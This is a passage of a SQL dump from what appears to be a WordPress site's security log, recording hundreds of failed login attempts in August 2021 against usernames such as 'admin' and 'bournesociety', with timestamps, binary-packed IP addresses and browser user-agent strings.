AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(4316,7473,1629154718.791584,1,'loginFailInvalidUsername','digyx',0,'\0\0\0\0\0\0\0\0\0\0��Y��~','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(4317,7474,1629154720.461936,1,'loginFailInvalidUsername','digyx',0,'\0\0\0\0\0\0\0\0\0\0��Y��~','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(4318,7475,1629154721.427291,1,'loginFailInvalidUsername','digyx',0,'\0\0\0\0\0\0\0\0\0\0��Y��~','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(4319,7476,1629154721.994122,1,'loginFailInvalidUsername','digyx',0,'\0\0\0\0\0\0\0\0\0\0��Y��~','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(4320,7477,1629154722.950751,1,'loginFailInvalidUsername','digyx',0,'\0\0\0\0\0\0\0\0\0\0��Y��~','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(4321,7478,1629154724.161936,1,'loginFailInvalidUsername','digyx',0,'\0\0\0\0\0\0\0\0\0\0��Y��~','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(4322,7478,1629154724.175201,1,'loginFailInvalidUsername','digyx',0,'\0\0\0\0\0\0\0\0\0\0��Y��~','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(4323,7479,1629154725.104496,1,'loginFailInvalidUsername','digyx',0,'\0\0\0\0\0\0\0\0\0\0��Y��~','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(4324,7479,1629154725.131769,1,'loginFailInvalidUsername','digyx',0,'\0\0\0\0\0\0\0\0\0\0��Y��~','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(4325,7480,1629154726.203284,1,'loginFailInvalidUsername','digyx',0,'\0\0\0\0\0\0\0\0\0\0��Y��~','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(4326,7481,1629154726.821478,1,'loginFailInvalidUsername','digyx',0,'\0\0\0\0\0\0\0\0\0\0��Y��~','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(4327,7481,1629154726.924706,1,'loginFailInvalidUsername','digyx',0,'\0\0\0\0\0\0\0\0\0\0��Y��~','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(4328,7483,1629154986.385256,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0���A��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4329,7484,1629156130.197951,1,'loginFailInvalidUsername','bournesociety',0,'\0\0\0\0\0\0\0\0\0\0��k�.6','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:31.0) Gecko/20100101 Firefox/31.0'),(4330,7485,1629156294.790099,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��q�H�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4331,7486,1629159032.866185,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��RЧE','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4332,7487,1629160285.219216,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��|F�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4333,7488,1629161715.439107,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��#�	','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4334,7489,1629163046.207623,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��#ގs','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4335,7490,1629164426.541171,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��g\'7','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4336,7491,1629164607.383004,1,'loginFailInvalidUsername','bournesociety',0,'\0\0\0\0\0\0\0\0\0\0��?��','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:31.0) Gecko/20100101 Firefox/31.0'),(4337,7492,1629164894.612839,1,'loginFailInvalidUsername','bournesociety',0,'\0\0\0\0\0\0\0\0\0\0���>L','Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36'),(4338,7493,1629165820.145612,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��3QJ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4339,7494,1629167118.281872,1,'loginFailInvalidUsername','bournesociety',0,'\0\0\0\0\0\0\0\0\0\0��k�0�','Mozilla/5.0 (Windows NT 6.1; rv:31.0) Gecko/20100101 Firefox/31.0'),(4340,7495,1629167133.104083,1,'loginFailInvalidUsername','test',0,'\0\0\0\0\0\0\0\0\0\0���?�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4341,7496,1629169785.055293,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0���n�u','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4342,7497,1629171123.903221,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0����]M','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4343,7498,1629172695.474434,1,'loginFailInvalidUsername','bournesociety',0,'\0\0\0\0\0\0\0\0\0\0��k�.6','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0'),(4344,7499,1629173050.651641,1,'loginFailInvalidUsername','bournesociety',0,'\0\0\0\0\0\0\0\0\0\0��Ǩf�','Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53'),(4345,7500,1629174062.313768,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0���La','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4346,7501,1629175109.310818,1,'loginFailInvalidUsername','bournesociety',0,'\0\0\0\0\0\0\0\0\0\0���>L','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36'),(4347,7502,1629175350.031785,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��p�wB','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4348,7503,1629178112.668773,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��X�$�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4349,7504,1629185253.872059,1,'loginFailInvalidUsername','bournesociety',0,'\0\0\0\0\0\0\0\0\0\0���>L','Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36'),(4350,7505,1629185440.515072,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����D+','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(4351,7506,1629185440.778682,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����D+','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(4352,7507,1629185441.184342,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����D+','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(4353,7508,1629185441.431309,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����D+','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(4354,7509,1629185441.637169,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����D+','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(4355,7510,1629185441.907853,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����D+','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(4356,7511,1629185442.179170,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����D+','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(4357,7512,1629185442.746540,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����D+','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(4358,7513,1629185443.710231,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����D+','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(4359,7514,1629185444.211326,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����D+','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(4360,7515,1629185444.420894,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����D+','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(4361,7516,1629185445.152817,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����D+','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(4362,7517,1629185445.841499,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����D+','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(4363,7517,1629185445.884823,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����D+','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(4364,7518,1629185446.238054,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����D+','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(4365,7518,1629185446.273020,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����D+','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(4366,7519,1629185446.506269,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����D+','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(4367,7520,1629185446.790584,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����D+','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(4368,7520,1629185446.831661,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����D+','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(4369,7522,1629192082.166933,1,'loginFailInvalidUsername','bournesociety',0,'\0\0\0\0\0\0\0\0\0\0��?��','Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'),(4370,7523,1629193260.692179,1,'loginFailInvalidUsername','bournesociety',0,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/36.0.1985.125 Chrome/36.0.1985.125 Safari/537.36'),(4371,7524,1629195347.754874,1,'loginFailInvalidUsername','bournesociety',0,'\0\0\0\0\0\0\0\0\0\0���>L','Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36'),(4372,7525,1629205661.270995,1,'loginFailInvalidUsername','wordcamp',0,'\0\0\0\0\0\0\0\0\0\0���>L','Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36'),(4373,7526,1629208887.582807,1,'loginFailInvalidUsername','bournesociety',0,'\0\0\0\0\0\0\0\0\0\0��k�.6','Mozilla/5.0 (Windows NT 5.1; rv:30.0) Gecko/20100101 Firefox/30.0'),(4374,7527,1629214535.557773,1,'loginFailInvalidUsername','bournesociety',0,'\0\0\0\0\0\0\0\0\0\0��k�4�','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko'),(4375,7531,1629221286.775357,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4376,7532,1629221493.443781,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4377,7533,1629221700.142925,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4378,7534,1629221907.331975,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���Z�_','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4379,7535,1629222127.511838,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���[h�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4380,7536,1629222313.586200,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���\0g3','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4381,7537,1629222546.803637,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����o','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4382,7538,1629222738.867415,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��%�[','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4383,7539,1629222918.336327,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��/���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4384,7540,1629223119.926065,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���3�:','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4385,7541,1629223347.401108,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��Oe,','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4386,7542,1629223527.536275,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����I','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4387,7543,1629223733.803339,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��w��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4388,7543,1629223733.846815,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��w��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4389,7544,1629223944.449502,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4390,7545,1629224139.485344,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���`�Q','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4391,7546,1629224373.036010,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��m��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4392,7547,1629224569.201705,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��\"P�}','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4393,7548,1629224750.248716,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��e�+','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4394,7548,1629224750.258520,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��e�+','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4395,7549,1629224965.696079,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���AA�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4396,7550,1629225163.821903,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��g���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4397,7551,1629225361.082868,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��4�@�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4398,7552,1629225586.797282,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��%�[','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4399,7553,1629225767.780148,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���RW�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4400,7554,1629225998.014721,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��_�+�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4401,7555,1629226211.148712,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��12�k','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4402,7556,1629226436.400756,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����d5','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4403,7557,1629226602.752994,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��R��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4404,7558,1629226799.472152,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��g�.�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4405,7559,1629227061.816330,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��\"DaF','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4406,7561,1629227584.324536,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���X�\'','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4407,7562,1629227748.725383,1,'loginFailInvalidUsername','bournesociety',0,'\0\0\0\0\0\0\0\0\0\0��?��','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36'),(4408,7563,1629227898.510424,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����t','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4409,7564,1629228182.155354,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����#X','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4410,7565,1629228397.037873,1,'loginFailInvalidUsername','bournesociety',0,'\0\0\0\0\0\0\0\0\0\0��k�-:','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36'),(4411,7566,1629228476.396962,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���R�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4412,7567,1629228759.969824,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��3KZ\'','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4413,7568,1629229000.643874,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����3�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4414,7569,1629229315.312159,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���\"ɪ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4415,7570,1629229615.927153,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��E��|','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4416,7571,1629229902.707595,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����\n','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4417,7573,1629230476.466312,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4418,7574,1629230777.953672,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��H�%�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4419,7575,1629231063.863387,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����V�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4420,7576,1629231353.819611,1,'loginFailInvalidUsername','bournesociety',0,'\0\0\0\0\0\0\0\0\0\0��k�?�','Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53'),(4421,7577,1629231365.511956,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��6&��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4422,7578,1629231754.603685,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��]q�v','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4423,7578,1629231754.612248,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��]q�v','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4424,7579,1629231797.425042,1,'loginFailInvalidUsername','bournesociety',0,'\0\0\0\0\0\0\0\0\0\0�����;','Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53'),(4425,7580,1629232238.521857,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4426,7581,1629232527.621054,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����Ϝ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4427,7582,1629232835.007496,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��3�e2','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4428,7583,1629233161.458624,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����z�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4429,7583,1629233161.485324,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����z�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4430,7584,1629233391.196653,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��ψ.','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4431,7585,1629233692.393643,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��C͘','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4432,7586,1629234023.913951,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��}Ϋ�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4433,7586,1629234024.015456,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��}Ϋ�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4434,7587,1629234347.093318,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���F�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4435,7588,1629234636.771246,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����zX','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4436,7588,1629234636.796576,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����zX','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4437,7589,1629234894.418299,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��?\n�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 